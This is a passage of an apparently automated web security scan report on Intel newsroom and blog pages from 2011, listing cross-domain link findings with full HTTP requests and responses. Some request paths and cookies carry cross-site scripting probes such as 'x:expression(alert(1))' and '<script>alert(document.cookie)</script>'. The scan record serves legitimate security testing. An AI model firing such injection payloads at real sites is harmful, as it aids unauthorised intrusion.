<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
<li style="padding-left: 8px;"><a href="http://www.intc.com/index.cfm" title="Investor Relations">Investor Relations</a>
...[SNIP]...
<param name="movie" value="http://www.youtube.com/cp/vjVQa1PpcFNbtPuEzn9t8IoLmKkc5WncB0tdgv7Cbmg="/><embed height="302" src="http://www.youtube.com/cp/vjVQa1PpcFNbtPuEzn9t8IoLmKkc5WncB0tdgv7Cbmg=" type="application/x-shockwave-flash" width="470" wmode="transparent"></embed>
...[SNIP]...
<span class="rh-rss">Follow Us: <a href="http://twitter.com/intel" onclick="var s='s_gs()';waCustomLink(this,'','e','wa_iid=pr1_twitterIntel&amp;wa_reportSuites=intelcorpcimintelpress');" target="_blank">Intel</a>..|..<a href="http://twitter.com/intelnews" onclick="var s='s_gs()';waCustomLink(this,'','e','wa_iid=pr1_twitterIntelNews&amp;wa_reportSuites=intelcorpcimintelpress');" target="_blank">Intel News</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

17.13. http://newsroom.intel.com/community/intel_newsroom/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/

Issue detail

The page was loaded from a URL containing a query string:
  • http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
The response contains the following links to other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://twitter.com/intel
  • http://twitter.com/intelnews
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.youtube.com/cp/vjVQa1PpcFNbtPuEzn9t8IoLmKkc5WncB0tdgv7Cbmg=

Request

GET /community/intel_newsroom/?iid=ftr+press HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/about/index.htm?iid=gg_about-en_US+intel_aboutintel
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:11:09 GMT
Server: Apache
Set-Cookie: JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; Domain=.intel.com; Path=/
Set-Cookie: jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323031363b; Expires=Mon, 07-Mar-2011 23:11:11 GMT; Path=/
X-JAL: 613
Content-Language: en-US
CacheHit: D=624946 t=1296947469127528
X-JSL: D=624952 t=1296947469127528
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
<li style="padding-left: 8px;"><a href="http://www.intc.com/index.cfm" title="Investor Relations">Investor Relations</a>
...[SNIP]...
<param name="movie" value="http://www.youtube.com/cp/vjVQa1PpcFNbtPuEzn9t8IoLmKkc5WncB0tdgv7Cbmg="/><embed height="302" src="http://www.youtube.com/cp/vjVQa1PpcFNbtPuEzn9t8IoLmKkc5WncB0tdgv7Cbmg=" type="application/x-shockwave-flash" width="470" wmode="transparent"></embed>
...[SNIP]...
<span class="rh-rss">Follow Us: <a href="http://twitter.com/intel" onclick="var s='s_gs()';waCustomLink(this,'','e','wa_iid=pr1_twitterIntel&amp;wa_reportSuites=intelcorpcimintelpress');" target="_blank">Intel</a>..|..<a href="http://twitter.com/intelnews" onclick="var s='s_gs()';waCustomLink(this,'','e','wa_iid=pr1_twitterIntelNews&amp;wa_reportSuites=intelcorpcimintelpress');" target="_blank">Intel News</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

17.14. http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51"style="x:expression(alert(1))"f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/blog/2011/0176c51"style="x:expression(alert(1))"f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The page was loaded from a URL containing a query string:
  • http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51"style="x:expression(alert(1))"f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
The response contains the following links to other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /community/intel_newsroom/blog/2011/0176c51"style="x:expression(alert(1))"f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://burp/show/14
Accept-Language: en-US
Cookie: JSESSIONID=78E12C4CBC31892852D8659ED77D7E3B.node7IPR; wa_visitId=%7Bf2a84205-6e62-e72c-945c-67c55cb850af%7D; s_cc=true; cmp_cookie=rss-258152-c1-264093; s_lv=1296957489568; s_lv_s=First%20Visit; cf=1; gpv_p18=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A70009050119C8-40000115E040587E[CE]; INTELHistoryTracker=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business%3Fcid%3Drss-258152-c1-264093:Error; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; __utma=174403261.1366145624.1296957487.1296957487.1296957487.1; __utmb=174403261.1.10.1296957487; __utmc=174403261; __utmz=174403261.1296957487.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Pragma: no-cache
Host: newsroom.intel.com

Response

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 01:56:58 GMT
Server: Apache
X-JAL: 17
Content-Language: en-US
CacheHit: D=26518 t=1296957418334302
X-JSL: D=26524 t=1296957418334302
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

17.15. http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The page was loaded from a URL containing a query string:
  • http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
The response contains the following links to other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093 HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://burp/show/13
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; JSESSIONID=5E01E36EFE93C49336779F5E81214FBA.node6IPR; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296957276.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/9; __utma=174403261.410478132.1296947569.1296947569.1296957276.2; __utmc=174403261; __utmb=174403261.1.10.1296957276; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296957287861; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dgg_about%2Bintel_pressroom97bc3%25253cscript%25253ealert%281%29%25253; s_sq=intelcorpitcenter%2Cintelcorpcim%2Cintelcorpbus%2Cintelitcenterenus%3D%2526pid%253Dcim%25253Aitcenter%25253Aen_us%25253Alibrary%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/p/en_US/support%25253Fiid%25253Dhdr%25252Bsupport%2526ot%253DA; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility,http%3A//itcenter.intel.com/ResourceLibrary%3F4b801%27%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E7e58a74ceab%3D1:%0A%09%0AIT%20Center%20Resource%20Library%0A%0A,http%3A//www.intel.com/p/en_US/support%3Fiid%3Dhdr+support:Intel%AE%20Product%20Support,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dgg_about+intel_pressroom97bc3%25253Cscript%25253Ealert%281%29%25253C/script%25253E00808251755:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel

Response

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 01:56:02 GMT
Server: Apache
X-JAL: 18
Content-Language: en-US
CacheHit: D=26872 t=1296957362198101
X-JSL: D=26877 t=1296957362198101
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

17.16. http://newsroom.intel.com/recent-updates.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /recent-updates.jspa

Issue detail

The page was loaded from a URL containing a query string:
  • http://newsroom.intel.com/recent-updates.jspa?containerID=2016&containerType=14&recursive=false&visibleTypes=102-800-38&filterEnabled=true&start=3&numResults=25
The response contains the following links to other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /recent-updates.jspa?containerID=2016&containerType=14&recursive=false&visibleTypes=102-800-38&filterEnabled=true&start=3&numResults=25 HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:15 GMT
Server: Apache
X-JAL: 144
Content-Language: en-US
CacheHit: D=175209 t=1296947715204574
X-JSL: D=175215 t=1296947715204574
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

17.17. http://scoop.intel.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scoop.intel.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://scoop.intel.com/?iid=gg_play+inside-scoop
The response contains the following links to other domains:
  • http://0.gravatar.com/avatar/2a1d58e41b90c111c740ba1a86a77c1d?s=63&d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&r=G
  • http://0.gravatar.com/avatar/2d0ee9aba2269cf05cd955703635d973?s=50&d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D50&r=G
  • http://0.gravatar.com/avatar/68b93e649bc65d3729f7a2f7c7087d89?s=63&d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&r=G
  • http://0.gravatar.com/avatar/a322c0b1810867c520aff1736916882e?s=50&d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D50&r=G
  • http://0.gravatar.com/avatar/a322c0b1810867c520aff1736916882e?s=63&d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&r=G
  • http://0.gravatar.com/avatar/e2940a91a2d9a89d4db9ded4e942f0f1?s=63&d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&r=G
  • http://0.gravatar.com/avatar/e296fcca944c6f86c51a337f85eb24be?s=63&d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&r=G
  • http://0.gravatar.com/avatar/eb016697bec86ef21c9bffa1efcd5ff0?s=50&d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D50&r=G
  • http://0.gravatar.com/avatar/eb016697bec86ef21c9bffa1efcd5ff0?s=63&d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&r=G
  • http://1.gravatar.com/avatar/34c5480f25ae43a3ea832abcb19c83c5?s=63&d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&r=G
  • http://1.gravatar.com/avatar/39f49a4e373cca40fe9d15070d2864a1?s=63&d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&r=G
  • http://1.gravatar.com/avatar/5ece621b1bfcef68ee17551d8ccab2b1?s=63&d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&r=G
  • http://1.gravatar.com/avatar/5f2a79d1a0107b9561de9987f1d3b229?s=63&d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&r=G
  • http://1.gravatar.com/avatar/78e32167099b3a0b5193cc17b67684cb?s=63&d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&r=G
  • http://1.gravatar.com/avatar/96944303a89d5bd13886ec5a4376fb31?s=63&d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&r=G
  • http://1.gravatar.com/avatar/9ad701d61aeacd3bee9a4a08914c5c91?s=63&d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&r=G
  • http://1.gravatar.com/avatar/bb30c1bfeba396c0e5fbc412da3bd1c7?s=50&d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D50&r=G
  • http://1.gravatar.com/avatar/bb30c1bfeba396c0e5fbc412da3bd1c7?s=63&d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&r=G
  • http://feeds.feedburner.com/intel/scoop
  • http://goo.gl/fb/Cwlyk
  • http://goo.gl/fb/TyNQw
  • http://goo.gl/fb/uASg6
  • http://intel.ly/hMMa02
  • http://platform.twitter.com/widgets.js?ver=1.1
  • http://search.twitter.com/search?q=intel
  • http://twitter.com/intelscoop
  • http://twitter.com/intelscoop/status/30015538218401792
  • http://twitter.com/intelscoop/status/30028425678815232
  • http://twitter.com/intelscoop/status/30823114275299329
  • http://twitter.com/intelscoop/status/31024235971350528
  • http://twitter.com/intelscoop/status/32550600621162497
  • http://twitter.com/share?url=http%3A%2F%2Fscoop.intel.com%2Fgrowing-pains-of-smart-tv%2F&via=IntelSmartTV&text=%28%23intel%20blog%29%20Growing%20pains%20of%20%23SmartTV&related=IntelSmartTV&lang=en&count=horizontal&counturl=http%3A%2F%2Fscoop.intel.com%2Fgrowing-pains-of-smart-tv%2F
  • http://twitter.com/share?url=http%3A%2F%2Fscoop.intel.com%2Fmedical-benefits-and-computer-gaming%2F&text=Medical%20Benefits%20and%20Computer%20Gaming.&related=&lang=en&count=horizontal&counturl=http%3A%2F%2Fscoop.intel.com%2Fmedical-benefits-and-computer-gaming%2F
  • http://twitter.com/share?url=http%3A%2F%2Fscoop.intel.com%2Fonline-gaming-tips-for-newbies%2F&text=Online%20Gaming%20Tips%20for%20Newbies&related=&lang=en&count=horizontal&counturl=http%3A%2F%2Fscoop.intel.com%2Fonline-gaming-tips-for-newbies%2F
  • http://twitter.com/share?url=http%3A%2F%2Fscoop.intel.com%2Fsmall-actions-by-women-at-%25e2%2580%2598blissdom%25e2%2580%2599-can-spark-big-change%2F&text=Small%20Actions%20by%20Women%20at%20%E2%80%98Blissdom%E2%80%99%20Can%20Spark%20Big%20Change&related=&lang=en&count=horizontal&counturl=http%3A%2F%2Fscoop.intel.com%2Fsmall-actions-by-women-at-%25e2%2580%2598blissdom%25e2%2580%2599-can-spark-big-change%2F
  • http://twitter.com/share?url=http%3A%2F%2Fscoop.intel.com%2Fwill-i-am-rocks-intel-sales-and-marketing-conference%2F&text=Will.i.am%20Rocks%20Intel%20Sales%20and%20Marketing%20Conference&related=&lang=en&count=horizontal&counturl=http%3A%2F%2Fscoop.intel.com%2Fwill-i-am-rocks-intel-sales-and-marketing-conference%2F
  • http://www.facebook.com/Intel
  • http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FIntel&width=185&colorscheme=light&connections=9&stream=false&header=false&height=330
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.twitter.com/iamwill
  • http://www.youtube.com/user/channelintel

Request

GET /?iid=gg_play+inside-scoop HTTP/1.1
Host: scoop.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3
X-Pingback: http://scoop.intel.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48873

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="e
...[SNIP]...
<link rel="stylesheet" href="http://scoop.intel.com/wp-content/themes/prose/style.css" type="text/css" media="screen" />
<link rel="alternate" type="application/rss+xml" title="Inside Scoop &raquo; Feed" href="http://feeds.feedburner.com/intel/scoop" />
<link rel="alternate" type="application/rss+xml" title="Inside Scoop &raquo; Comments Feed" href="http://scoop.intel.com/comments/feed/" />
...[SNIP]...
<link rel='stylesheet' id='contact-form-7-css' href='http://scoop.intel.com/wp-content/plugins/contact-form-7/styles.css?ver=2.4.2' type='text/css' media='all' />
<script type='text/javascript' src='http://platform.twitter.com/widgets.js?ver=1.1'></script>
...[SNIP]...
<div class="post-head">
                           <img alt='' src='http://0.gravatar.com/avatar/a322c0b1810867c520aff1736916882e?s=50&amp;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D50&amp;r=G' class='avatar avatar-50 photo' height='50' width='50' />                                                        <h2 class="entry-title">
...[SNIP]...
